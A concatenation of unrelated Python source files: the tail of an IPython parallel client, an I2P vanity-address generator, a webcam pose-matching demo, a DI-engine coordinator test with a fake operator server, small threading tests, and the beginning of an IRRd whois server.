# not a length-one list
if single_result:
theids = theids[0]
if remote_ids:
ar = AsyncHubResult(self, msg_ids=theids)
else:
ar = AsyncResult(self, msg_ids=theids)
if block:
ar.wait()
return ar
@spin_first
def resubmit(self, indices_or_msg_ids=None, metadata=None, block=None):
"""Resubmit one or more tasks.
in-flight tasks may not be resubmitted.
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of indices to be retrieved
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, basestring):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
content = dict(msg_ids = theids)
self.session.send(self._query_socket, 'resubmit_request', content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
mapping = content['resubmitted']
new_ids = [ mapping[msg_id] for msg_id in theids ]
ar = AsyncHubResult(self, msg_ids=new_ids)
if block:
ar.wait()
return ar
@spin_first
def result_status(self, msg_ids, status_only=True):
"""Check on the status of the result(s) of the apply request with `msg_ids`.
If status_only is False, then the actual results will be retrieved, else
only the status of the results will be checked.
Parameters
----------
msg_ids : list of msg_ids
if int:
Passed as index to self.history for convenience.
status_only : bool (default: True)
if False:
Retrieve the actual results of completed tasks.
Returns
-------
results : dict
There will always be the keys 'pending' and 'completed', which will
be lists of msg_ids that are incomplete or complete. If `status_only`
is False, then completed results will be keyed by their `msg_id`.
"""
if not isinstance(msg_ids, (list,tuple)):
msg_ids = [msg_ids]
theids = []
for msg_id in msg_ids:
if isinstance(msg_id, int):
msg_id = self.history[msg_id]
if not isinstance(msg_id, basestring):
raise TypeError("msg_ids must be str, not %r"%msg_id)
theids.append(msg_id)
completed = []
local_results = {}
# comment this block out to temporarily disable local shortcut:
for msg_id in theids:
if msg_id in self.results:
completed.append(msg_id)
local_results[msg_id] = self.results[msg_id]
theids.remove(msg_id)
if theids: # some not locally cached
content = dict(msg_ids=theids, status_only=status_only)
msg = self.session.send(self._query_socket, "result_request", content=content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
buffers = msg['buffers']
else:
content = dict(completed=[],pending=[])
content['completed'].extend(completed)
if status_only:
return content
failures = []
# load cached results into result:
content.update(local_results)
# update cache with results:
for msg_id in sorted(theids):
if msg_id in content['completed']:
rec = content[msg_id]
parent = rec['header']
header = rec['result_header']
rcontent = rec['result_content']
iodict = rec['io']
if isinstance(rcontent, str):
rcontent = self.session.unpack(rcontent)
md = self.metadata[msg_id]
md_msg = dict(
content=rcontent,
parent_header=parent,
header=header,
metadata=rec['result_metadata'],
)
md.update(self._extract_metadata(md_msg))
if rec.get('received'):
md['received'] = rec['received']
md.update(iodict)
if rcontent['status'] == 'ok':
if header['msg_type'] == 'apply_reply':
res,buffers = serialize.unserialize_object(buffers)
elif header['msg_type'] == 'execute_reply':
res = ExecuteReply(msg_id, rcontent, md)
else:
raise KeyError("unhandled msg type: %r" % header['msg_type'])
else:
res = self._unwrap_exception(rcontent)
failures.append(res)
self.results[msg_id] = res
content[msg_id] = res
if len(theids) == 1 and failures:
raise failures[0]
error.collect_exceptions(failures, "result_status")
return content
@spin_first
def queue_status(self, targets='all', verbose=False):
"""Fetch the status of engine queues.
Parameters
----------
targets : int/str/list of ints/strs
the engines whose states are to be queried.
default : all
verbose : bool
Whether to return lengths only, or lists of ids for each element
"""
if targets == 'all':
# allow 'all' to be evaluated on the engine
engine_ids = None
else:
engine_ids = self._build_targets(targets)[1]
content = dict(targets=engine_ids, verbose=verbose)
self.session.send(self._query_socket, "queue_request", content=content)
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
status = content.pop('status')
if status != 'ok':
raise self._unwrap_exception(content)
content = rekey(content)
if isinstance(targets, int):
return content[targets]
else:
return content
def _build_msgids_from_target(self, targets=None):
"""Build a list of msg_ids from the list of engine targets"""
if not targets: # needed as _build_targets otherwise uses all engines
return []
target_ids = self._build_targets(targets)[0]
return filter(lambda md_id: self.metadata[md_id]["engine_uuid"] in target_ids, self.metadata)
def _build_msgids_from_jobs(self, jobs=None):
"""Build a list of msg_ids from "jobs" """
if not jobs:
return []
msg_ids = []
if isinstance(jobs, (basestring,AsyncResult)):
jobs = [jobs]
bad_ids = filter(lambda obj: not isinstance(obj, (basestring, AsyncResult)), jobs)
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
return msg_ids
def purge_local_results(self, jobs=[], targets=[]):
"""Clears the client caches of results and their metadata.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_local_results('all')` to scrub everything from the Clients's
results and metadata caches.
After this call all `AsyncResults` are invalid and should be discarded.
If you must "reget" the results, you can still do so by using
`client.get_result(msg_id)` or `client.get_result(asyncresult)`. This will
redownload the results from the hub if they are still available
(i.e `client.purge_hub_results(...)` has not been called.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be purged.
targets : int/list of ints
The engines, by integer ID, whose entire result histories are to be purged.
Raises
------
RuntimeError : if any of the tasks to be purged are still outstanding.
"""
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if jobs == 'all':
if self.outstanding:
raise RuntimeError("Can't purge outstanding tasks: %s" % self.outstanding)
self.results.clear()
self.metadata.clear()
else:
msg_ids = set()
msg_ids.update(self._build_msgids_from_target(targets))
msg_ids.update(self._build_msgids_from_jobs(jobs))
still_outstanding = self.outstanding.intersection(msg_ids)
if still_outstanding:
raise RuntimeError("Can't purge outstanding tasks: %s" % still_outstanding)
map(self.results.pop, msg_ids)
map(self.metadata.pop, msg_ids)
@spin_first
def purge_hub_results(self, jobs=[], targets=[]):
"""Tell the Hub to forget results.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub everything from the Hub's db.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if targets:
targets = self._build_targets(targets)[1]
# construct msg_ids from jobs
if jobs == 'all':
msg_ids = jobs
else:
msg_ids = self._build_msgids_from_jobs(jobs)
content = dict(engine_ids=targets, msg_ids=msg_ids)
self.session.send(self._query_socket, "purge_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
def purge_results(self, jobs=[], targets=[]):
"""Clears the cached results from both the hub and the local client
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub every cached result from both the Hub's and
the Client's db.
Equivalent to calling both `purge_hub_results()` and `purge_client_results()` with
the same arguments.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
self.purge_local_results(jobs=jobs, targets=targets)
self.purge_hub_results(jobs=jobs, targets=targets)
def purge_everything(self):
"""Clears all content from previous Tasks from both the hub and the local client
In addition to calling `purge_results("all")` it also deletes the history and
other bookkeeping lists.
"""
self.purge_results("all")
self.history = []
self.session.digest_history.clear()
@spin_first
def hub_history(self):
"""Get the Hub's history
Just like the Client, the Hub has a history, which is a list of msg_ids.
This will contain the history of all clients, and, depending on configuration,
may contain history across multiple cluster sessions.
Any msg_id returned here is a valid argument to `get_result`.
Returns
-------
msg_ids : list of strs
list of all msg_ids, ordered by task submission time.
"""
self.session.send(self._query_socket, "history_request", content={})
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
else:
return content['history']
@spin_first
def db_query(self, query, keys=None):
"""Query the Hub's TaskRecord database
This will return a list of task record dicts that match `query`
Parameters
----------
query : mongodb query dict
The search dict. See mongodb query docs for details.
keys : list of strs [optional]
The subset of keys to be returned. The default is to fetch everything but buffers.
'msg_id' will *always* be included.
"""
if isinstance(keys, basestring):
keys = [keys]
content = dict(query=query, keys=keys)
self.session.send(self._query_socket, "db_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
records = content['records']
buffer_lens = content['buffer_lens']
result_buffer_lens = content['result_buffer_lens']
buffers = msg['buffers']
has_bufs = buffer_lens is not None
has_rbufs = result_buffer_lens is not None
for i,rec in enumerate(records):
# relink buffers
if has_bufs:
blen = buffer_lens[i]
rec['buffers'], buffers = buffers[:blen],buffers[blen:]
if has_rbufs:
blen = result_buffer_lens[i]
rec['result_buffers'], buffers = buffers[:blen],buffers[blen:]
return records
__all__ = [ 'Client' ]
|
i2pvain.py
|
#!/usr/bin/env python3
import sys
import os
import struct
import socket
import re
from hashlib import sha256
from base64 import b32encode, b64decode, b64encode
from multiprocessing import Process, Queue
def get_sam_address():
value = os.getenv("I2P_SAM_ADDRESS")
if value:
value = value.split(":")
return (value[0], int(value[1]))
else:
return ("127.0.0.1", 7656)
def vain(data, prefix, q):
cert_len = struct.unpack("!H", data[385:387])[0]
public_data = data[:387+cert_len]
data_tail = data[387+cert_len:]
head = public_data[:256] + os.urandom(88)
tail = public_data[352:]
head_hash = sha256(head)
while True:
padding = os.urandom(8)
new_hash = head_hash.copy()
new_hash.update(padding + tail)
if b32encode(new_hash.digest()).startswith(prefix):
new_data = head + padding + tail
address = b32encode(new_hash.digest()).decode()[:52].lower()
break
q.put({"address": address, "data": new_data+data_tail})
def get_new_destination(sam_address):
sam_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sam_socket.connect(sam_address)
except ConnectionRefusedError:
print("SAM API is unavailable. Make sure SAM is enabled on your I2P router.")
exit()
sam_socket.send(b"HELLO VERSION MIN=3.1 MAX=3.1\n")
reply = sam_socket.recv(4096)
if reply == b"HELLO REPLY RESULT=OK VERSION=3.1\n":
sam_socket.send(b"DEST GENERATE SIGNATURE_TYPE=7\n")
reply = sam_socket.recv(4096)
dest = reply.split(b" ")[3][5:-1]
sam_socket.close()
return b64decode(dest, altchars="-~", validate=True)
else:
print(reply)
exit()
def generate_address(prefix):
prefix = prefix.upper().encode()
data = get_new_destination(get_sam_address())
processes = []
q = Queue()
for x in range(os.cpu_count()):
p = Process(target=vain, args=(data, prefix, q))
p.start()
processes.append(p)
new_key = q.get()
for x in processes: x.terminate()
return new_key
def main():
if len(sys.argv) < 2:
print("Usage: {} PREFIX [FILE]".format(sys.argv[0]))
return
prefix = sys.argv[1]
if not re.match("^[a-zA-Z0-9]+$", prefix):
print("Prefix must be alphanumeric string")
return
if len(sys.argv) == 3:
outfile = sys.argv[2]
else:
outfile = "key.dat"
new_key = generate_address(prefix)
print(new_key["address"] + ".b32.i2p")
print(b64encode(new_key["data"], altchars=b"-~").decode())
if os.access(os.path.dirname(outfile) or ".", os.W_OK):
with open(outfile, 'wb') as f:
f.write(new_key["data"])
print("Key saved to -->", outfile)
if __name__ == "__main__":
main()
|
test_stray.py
|
# -*- coding: utf-8 -*-
"""
.. module:: test_stray
:platform: Unix
:synopsis: tests for the stray submodule.
.. moduleauthor:: Mehmet Mert Yıldıran <mert.yildiran@bil.omu.edu.tr>
"""
from multiprocessing import Process, Event
import time
from ava.stray import SystemTrayExitListenerSet, SystemTrayInit
import pytest
def test_stray():
e = Event()
SystemTrayExitListenerSet(e)
stray_proc = Process(target=SystemTrayInit)
stray_proc.start()
time.sleep(3)
stray_proc.terminate()
assert True
|
live_demo.py
|
"""Live demo of target pose matching."""
import utils
import inference
import cv2
import numpy as np
import seaborn as sns
import yaml
from time import sleep
from time import perf_counter as time
from threading import Thread
from collections import deque
from typing import Optional, Tuple
import argparse
import os
class TargetPoses:
def __init__(
self,
target_poses_path: str,
max_height: int,
initial_target: Optional[int] = 0,
border_width: int = 4,
border_color: Tuple[int, int, int] = (255, 255, 255),
selected_width: int = 12,
selected_color: Tuple[int, int, int] = (0, 200, 0),
completed_alpha: float = 0.7,
):
self.target_poses_path = target_poses_path
self.target_ind = initial_target
self.max_height = max_height
self.border_width = border_width
self.border_color = border_color
self.selected_width = selected_width
self.selected_color = selected_color
self.completed_alpha = completed_alpha
# Load data
with open(self.target_poses_path, "r") as f:
self.targets = yaml.load(f, yaml.Loader)
for i in range(len(self.targets)):
# Convert poses to numpy array.
self.targets[i]["pose"] = np.array(self.targets[i]["pose"])
self.targets[i]["norm_pose"] = np.array(self.targets[i]["norm_pose"])
# Initialize completeness flag
self.targets[i]["complete"] = False
# Preload and preprocess viz images.
self.img_height = self.max_height // len(self.targets)
for i, target in enumerate(self.targets):
img = cv2.imread(target["viz_path"])
scale = self.img_height / img.shape[0]
img = cv2.resize(img, None, fx=scale, fy=scale)
img = utils.add_border(img, self.border_width, self.border_color)
self.targets[i]["img"] = img
assert (
sum([target["img"].shape[0] for target in self.targets]) == self.max_height
)
def __len__(self) -> int:
return len(self.targets)
def next_target(self):
self.target_ind = (self.target_ind + 1) % len(self)
@property
def current_target(self):
return self.targets[self.target_ind]
@property
def width(self) -> int:
return self.targets[0]["img"].shape[1]
def reset_completeness(self):
for i in range(len(self)):
self.targets[i]["complete"] = False
def complete_current(self):
self.targets[self.target_ind]["complete"] = True
def render(self) -> np.ndarray:
rendered = []
for i, target in enumerate(self.targets):
img = target["img"].copy()
if self.target_ind is not None and i == self.target_ind:
img = utils.add_border(img, self.selected_width, self.selected_color)
elif target["complete"]:
img = cv2.addWeighted(
img,
self.completed_alpha,
np.full(img.shape, 255, dtype=img.dtype),
1 - self.completed_alpha,
0,
)
rendered.append(img)
rendered = np.concatenate(rendered, axis=0)
return rendered
class LiveDemo:
def __init__(
self,
camera: int = 0,
camera_width: int = 1920,
camera_height: int = 1080,
camera_brightness: int = 128,
fps: float = 30,
horizontal_mirror: bool = True,
render_scale: float = 1.0,
node_cmap: str = "tab20",
node_radius: int = 8,
node_thickness: int = 6,
arrow_thickness: int = 5,
max_arrow_length: int = 150,
target_thickness: int = 5,
rel_target_radius: float = 0.4,
blend_alpha: float = 0.6,
model_name: str = "thunder",
center_pad: bool = False,
min_score: float = 0.4,
buffer_size: int = 5,
target_poses_path: str = "data/target_poses.yaml",
):
self.camera = camera
self.camera_width = camera_width
self.camera_height = camera_height
self.camera_brightness = camera_brightness
self.fps = fps
self.horizontal_mirror = horizontal_mirror
self.render_scale = render_scale
self.node_cmap = node_cmap
self.node_radius = node_radius
self.node_thickness = node_thickness
self.arrow_thickness = arrow_thickness
self.max_arrow_length = max_arrow_length
self.target_thickness = target_thickness
self.rel_target_radius = rel_target_radius
self.blend_alpha = blend_alpha
self.model_name = model_name
self.center_pad = center_pad
self.min_score = min_score
self.buffer_size = buffer_size
self.target_poses_path = target_poses_path
# Setup camera.
if os.name == "nt":
self.capture = cv2.VideoCapture(self.camera, cv2.CAP_DSHOW)
print(f"Camera (ID: {self.camera}) using DirectShow (Windows).")
else:
self.capture = cv2.VideoCapture(self.camera)
self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, self.camera_width)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, self.camera_height)
self.capture.set(cv2.CAP_PROP_BRIGHTNESS, self.camera_brightness)
# Reset properties in case camera doesn't support the specified dimensions.
self.camera_width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
self.camera_height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
print(f"Camera (ID: {self.camera}) resolution: {self.camera_width} x {self.camera_height}")
# Initialize rendering.
cv2.namedWindow("frame", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("frame", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# Load model.
self.model = inference.load_model(model_name)
self.image_size = self.model.input.shape[1]
self.n_nodes = self.model.outputs[0].shape[0]
# Setup colors.
self.node_colors = (
np.array(sns.color_palette(self.node_cmap, self.n_nodes)) * 255
)
# Load target poses.
self.target_poses = TargetPoses(
target_poses_path=self.target_poses_path,
max_height=int(self.camera_height * self.render_scale),
)
# Specify nodes that will be used as targets.
# TODO: Parametrize this?
self.target_nodes = (
"left_shoulder",
"right_shoulder",
"left_elbow",
"right_elbow",
"left_wrist",
"right_wrist",
"left_hip",
"right_hip",
"left_knee",
"right_knee",
"left_ankle",
"right_ankle",
)
# Initialize buffers.
self.frame = None
self.points = None
self.scores = None
self.node_buffers = [
deque(maxlen=self.buffer_size) for _ in range(self.n_nodes)
]
self.smooth_points = np.full((self.n_nodes, 2), np.nan)
# Run the update thread.
self.done = False
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
def update(self):
while not self.done:
dt = 0
if self.capture.isOpened():
t0 = time()
# Fetch webcam image
cap_status, img = self.capture.read()
if self.horizontal_mirror:
# Horizontal mirror
img = img[:, ::-1]
# Crop to horizontal center to account for targets
crop_x0 = int((self.target_poses.width / self.render_scale) // 2)
crop_x1 = self.camera_width - crop_x0
img = img[:, crop_x0:crop_x1]
# Predict
self.points, self.scores = inference.predict(
self.model, img[:, :, ::-1], pad=self.center_pad
)
# Update keypoint buffer
for j, (pt, score) in enumerate(zip(self.points, self.scores)):
if score > self.min_score:
self.node_buffers[j].append(pt)
else:
self.node_buffers[j].append((np.nan, np.nan))
# Compute smoothed version
node_buffer = np.array(self.node_buffers[j]) # (n, 2)
if np.isnan(node_buffer).all():
self.smooth_points[j, :] = np.nan
else:
self.smooth_points[j] = np.nanmean(node_buffer, axis=0)
# Upscale for viz
img = cv2.resize(img, None, fx=self.render_scale, fy=self.render_scale)
# Copy raw for overlaying with alpha blending
img0 = img.copy()
# Draw nodes
for j in range(self.n_nodes):
if not (np.isnan(self.smooth_points[j]).all()):
pt = self.smooth_points[j] * self.render_scale
img = cv2.circle(
img,
(int(pt[0]), int(pt[1])),
radius=int(self.node_radius * self.render_scale),
color=self.node_colors[j][::-1],
thickness=int(self.node_thickness * self.render_scale),
lineType=cv2.LINE_AA,
)
# Target pose
target_pose = self.target_poses.current_target
ref_pts = self.smooth_points[[target_pose["ref1"], target_pose["ref2"]]]
if not (np.isnan(ref_pts).any()):
norm_factor = np.linalg.norm(ref_pts[0] - ref_pts[1])
origin = ref_pts.mean(axis=0)
n_in_target = 0
for node_name in self.target_nodes:
j = utils.KEYPOINT_NODES[node_name]
target_rel_pos = target_pose["norm_pose"][j]
img, in_target = self.render_target(
img,
keypoint=self.smooth_points[j],
target=origin + (norm_factor * target_rel_pos),
node_col=self.node_colors[j],
target_radius=self.rel_target_radius * norm_factor,
)
n_in_target += int(in_target)
if n_in_target == len(self.target_nodes):
# Completed pose! Show visual indicator and move to next pose.
# TODO: Hold for a min number of frames?
# Could store this in the pose_targets and use it to render a
# progress bar.
self.target_poses.complete_current()
self.target_poses.next_target()
# Alpha blend
img = cv2.addWeighted(
img, self.blend_alpha, img0, 1 - self.blend_alpha, 0
)
# Concatenate the rendered targets
img = np.concatenate([img, self.target_poses.render()], axis=1)
img = img[:, : int(self.camera_width * self.render_scale)]
# Save final rendered image
self.frame = img
dt = time() - t0
# Sleep for remainder of duty cycle, if any
sleep(max((1 / self.fps) - dt, 0))
def render_target(
self,
img,
keypoint,
target,
node_col,
target_radius,
):
dist_to_target = np.linalg.norm(target - keypoint)
in_target = dist_to_target < target_radius
if in_target:
target_col = (0, 255, 0)
else:
target_col = (0, 0, 255)
unit_vec = (target - keypoint) / dist_to_target
pt2 = (
unit_vec
* min(self.max_arrow_length * self.render_scale, dist_to_target)
) + keypoint
img = cv2.arrowedLine(
img,
pt1=(keypoint * self.render_scale).astype(int),
pt2=(pt2 * self.render_scale).astype(int),
color=node_col[::-1],
thickness=int(self.arrow_thickness * self.render_scale),
line_type=cv2.LINE_AA,
shift=0,
tipLength=0.1,
)
img = cv2.circle(
img,
(int(target[0] * self.render_scale), int(target[1] * self.render_scale)),
radius=int(min(target_radius, dist_to_target) * self.render_scale),
color=target_col,
thickness=int(self.target_thickness * self.render_scale),
lineType=cv2.LINE_AA,
)
return img, in_target
def show_frame(self):
"""Display rendered frame."""
if self.frame is None:
return
# Update rendered frame.
cv2.imshow("frame", self.frame)
# Wait for duty cycle and listen for key press.
key = cv2.waitKey(int(1000 / self.fps))
if key == 27 or key == 113: # Esc or q
# Quit.
self.done = True
self.thread.join()
elif key >= (1 + 48) and key <= (9 + 48):
# Set target pose
key_num = key - 48 # 1-based
self.target_poses.target_ind = (key_num - 1) % len(self.target_poses)
elif key == 114: # r
# Reset target pose completeness
self.target_poses.reset_completeness()
elif key == 9: # Tab
# Cycle through target poses
self.target_poses.next_target()
elif key > 0:
print("Pressed:", key)
def run(self):
"""Run demo until stopped."""
while not self.done:
self.show_frame()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-c", "--camera", help="Camera index to use.", type=int, default=0
)
parser.add_argument("--cpu", help="Disable GPU inference.", action="store_true")
parser.add_argument(
"-t",
"--target-poses",
help="Path to target poses YAML file.",
default="data/target_poses.yaml",
)
parser.add_argument(
"--tolerance",
help="Tolerance to the target pose locations. Higher is easier.",
type=float,
default=0.8,
)
args = parser.parse_args()
if args.cpu:
inference.use_cpu_only()
else:
inference.disable_gpu_preallocation()
# Run until stopped.
live_demo = LiveDemo(
camera=args.camera,
target_poses_path=args.target_poses,
rel_target_radius=args.tolerance,
)
live_demo.run()
|
test_fake_operator_server.py
|
import pytest
import os
import copy
import time
from threading import Thread
import json
from queue import Queue
from flask import Flask, request
from ding.worker import Coordinator
from ding.worker.learner.comm import NaiveLearner
from ding.worker.collector.comm import NaiveCollector
from ding.utils import find_free_port
from ding.config import compile_config_parallel
from ding.config.utils import parallel_test_main_config, parallel_test_create_config, parallel_test_system_config
DATA_PREFIX = 'SLAVE_COLLECTOR_DATA_FAKE_OPERATOR_TEST'
init_replicas_request = {
"collectors": {
"cpu": "0.5",
"memory": "200Mi",
"replicas": 2,
},
"learners": {
"cpu": "0.5",
"memory": "200Mi",
"gpu": "0",
"replicas": 1,
},
}
api_version = 'v1alpha1'
system_addr = 'https://0.0.0.0:14502'
def create_app(creator):
app = Flask(__name__)
@app.route('/{}/replicas'.format(api_version), methods=['POST'])
def post_replicas():
data = json.loads(request.data.decode())
collectors = data['collectors']["replicas"]
learners = data['learners']["replicas"]
creator.set_target_source(learners, collectors)
return {'success': True, 'code': 0, 'message': '', 'data': ''}
@app.route('/{}/replicas'.format(api_version), methods=['GET'])
def get_replicas():
data = json.loads(request.data.decode())
return {'success': True, 'code': 0, 'message': '', 'data': creator.current_resource}
return app
@pytest.fixture(scope='function')
def setup_config():
cfg = compile_config_parallel(
parallel_test_main_config, create_cfg=parallel_test_create_config, system_cfg=parallel_test_system_config
)
cfg.system.coordinator.operator_server = dict(
system_addr=system_addr,
api_version=api_version,
init_replicas_request=init_replicas_request,
collector_target_num=len(cfg.system.coordinator.collector),
learner_target_num=len(cfg.system.coordinator.learner),
)
return cfg
class Creator:
def __init__(self, learner_addr, collector_addr):
self.learner_addr = learner_addr
self.collector_addr = collector_addr
self.collector_demand = Queue()
self.learner_demand = Queue()
self.learners = {}
self.collectors = {}
self.end_flag = False
def set_target_source(self, learner_target, collector_target):
print('set_target_source', learner_target, collector_target)
time.sleep(3) # simulate
self.collector_demand.put(collector_target)
self.learner_demand.put(learner_target)
def start(self):
while not self.end_flag:
if self.learner_demand.empty() and self.collector_demand.empty():
time.sleep(0.1)
continue
else:
learner_demand, collector_demand = None, None
if not self.learner_demand.empty():
learner_demand = self.learner_demand.get()
if not self.collector_demand.empty():
collector_demand = self.collector_demand.get()
for i in range(collector_demand):
name, host, port = self.collector_addr[i]
self.collectors[name] = NaiveCollector(host, port, prefix=DATA_PREFIX)
self.collectors[name].start()
for i in range(learner_demand):
name, host, port = self.learner_addr[i]
self.learners[name] = NaiveLearner(host, port, prefix=DATA_PREFIX)
self.learners[name].start()
def close(self):
self.end_flag = True
time.sleep(1)
for t in self.learners.values():
t.close()
for t in self.collectors.values():
t.close()
@property
def current_resource(self):
collectors = {k: {} for k in self.collectors}
learners = {k: {} for k in self.learners}
return {"collectors": collectors, 'learners': learners}
@pytest.fixture(scope='function')
def setup_operator_server(setup_config):
host, port = system_addr.split("https://")[1].split(":")
port = int(port)
learner_addr = copy.deepcopy(setup_config.system.coordinator.learner)
learner_addr = list(learner_addr.values())
for i in range(len(learner_addr)):
learner_addr[i][0] = '{}:{}'.format(learner_addr[i][1], learner_addr[i][2])
collector_addr = copy.deepcopy(setup_config.system.coordinator.collector)
collector_addr = list(collector_addr.values())
for i in range(len(collector_addr)):
collector_addr[i][0] = '{}:{}'.format(collector_addr[i][1], collector_addr[i][2])
print(learner_addr, collector_addr)
creator = Creator(learner_addr, collector_addr)
creator_start_thread = Thread(target=creator.start, args=(), daemon=True)
creator_start_thread.start()
app = create_app(creator)
app_run_thread = Thread(target=app.run, args=(host, port), daemon=True)
app_run_thread.start()
yield app
creator.close()
print('end')
@pytest.mark.unittest
class TestCoordinatorFakeOperator:
def test_naive(self, setup_config, setup_operator_server):
os.popen('rm -rf {}*'.format(DATA_PREFIX))
# learner/collector is created by operator-server
setup_config.system.coordinator.learner = {}
setup_config.system.coordinator.collector = {}
try:
coordinator = Coordinator(setup_config)
coordinator.start()
while True:
if coordinator._commander._learner_task_finish_count == 1:
break
time.sleep(0.5)
coordinator.close()
except Exception as e:
os.popen('rm -rf {}*'.format(DATA_PREFIX))
assert False, e
collector_task_ids = [t for t in coordinator._historical_task if 'collector' in t]
for i in range(1, 21):
for t in collector_task_ids:
assert os.path.exists('{}_{}_{}'.format(DATA_PREFIX, t, i))
assert os.path.exists('{}_final_model.pth'.format(DATA_PREFIX))
assert len(coordinator._replay_buffer) == 0
learner_task_ids = [i for i in coordinator._historical_task if 'learner' in i]
for i in learner_task_ids:
assert len(coordinator._commander._learner_info[i]) == 5
os.popen('rm -rf {}*'.format(DATA_PREFIX))
|
test.py
|
from threading import Thread
import time
from _actual_aside import AsidePrint
aside = AsidePrint()
aside.run()
for x in range(10):
aside.append(x)
def threaded_adder(num):
global aside
for x in range(10):
aside.append(f"Adder {num} added {x}")
time.sleep(0.5)
adders = []
for x in range(5):
adder = Thread(target=threaded_adder, args=(x, ))
adders.append(adder)
for a in adders:
a.start()
aside.append('Done')
|
server.py
|
import logging
import multiprocessing as mp
import os
import signal
import socket
import socketserver
import threading
import time
from IPy import IP
from daemon.daemon import change_process_owner
from setproctitle import setproctitle
from irrd import ENV_MAIN_PROCESS_PID
from irrd.conf import get_setting
from irrd.server.access_check import is_client_permitted
from irrd.server.whois.query_parser import WhoisQueryParser
from irrd.storage.database_handler import DatabaseHandler
from irrd.storage.preload import Preloader
from irrd.utils.process_support import memory_trim
logger = logging.getLogger(__name__)
mp.allow_connection_pickling()
# Covered by integration tests
def start_whois_server(uid, gid): # pragma: no cover
"""
Start the whois server, listening forever.
This function does not return, except after SIGTERM is received.
"""
setproctitle('irrd-whois-server-listener')
address = (get_setting('server.whois.interface'), get_setting('server.whois.port'))
logger.info(f'Starting whois server on TCP {address}')
server = WhoisTCPServer(
server_address=address,
uid=uid,
gid=gid,
)
# When this process receives SIGTERM, shut down the server cleanly.
def sigterm_handler(signum, frame):
nonlocal server
def shutdown(server):
logging.info('Whois server shutting down')
server.shutdown()
server.server_close()
# Shutdown must be called from a thread to prevent blocking.
threading.Thread(target=shutdown, args=(server,)).start()
signal.signal(signal.SIGTERM, sigterm_handler)
server.serve_forever()
class WhoisTCPServer(socketserver.TCPServer): # pragma: no cover
"""
Server for whois queries.
Starts a number of worker processes that handle the client connections.
Whenever a client is connected, the connection is pushed onto a queue,
from which a worker picks it up. The workers are responsible for the
connection from then on.
"""
allow_reuse_address = True
request_queue_size = 50
def __init__(self, server_address, uid, gid, bind_and_activate=True): # noqa: N803
self.address_family = socket.AF_INET6 if IP(server_address[0]).version() == 6 else socket.AF_INET
super().__init__(server_address, None, bind_and_activate)
if uid and gid:
change_process_owner(uid=uid, gid=gid, initgroups=True)
self.connection_queue = mp.Queue()
self.workers = []
for i in range(int(get_setting('server.whois.max_connections'))):
worker = WhoisWorker(self.connection_queue)
worker.start()
self.workers.append(worker)
def process_request(self, request, client_address):
"""Push the client connection onto the queue for further handling."""
self.connection_queue.put((request, client_address))
def handle_error(self, request, client_address):
logger.error(f'Error while handling request from {client_address}', exc_info=True)
def shutdown(self):
"""
Shut down the server, by killing all child processes,
and then deferring to built-in TCPServer shutdown.
"""
for worker in self.workers:
try:
worker.terminate()
worker.join()
except Exception: # pragma: no cover
pass
return super().shutdown()
class WhoisWorker(mp.Process, socketserver.StreamRequestHandler):
"""
A whois worker is a process that handles whois client connections,
which are retrieved from a queue. After handling a connection,
the process waits for the next connection from the queue.s
"""
def __init__(self, connection_queue, *args, **kwargs):
self.connection_queue = connection_queue
# Note that StreamRequestHandler.__init__ is not called - the
# input for that is not available, as it's retrieved from the queue.
super().__init__(*args, **kwargs)
def run(self, keep_running=True) -> None:
"""
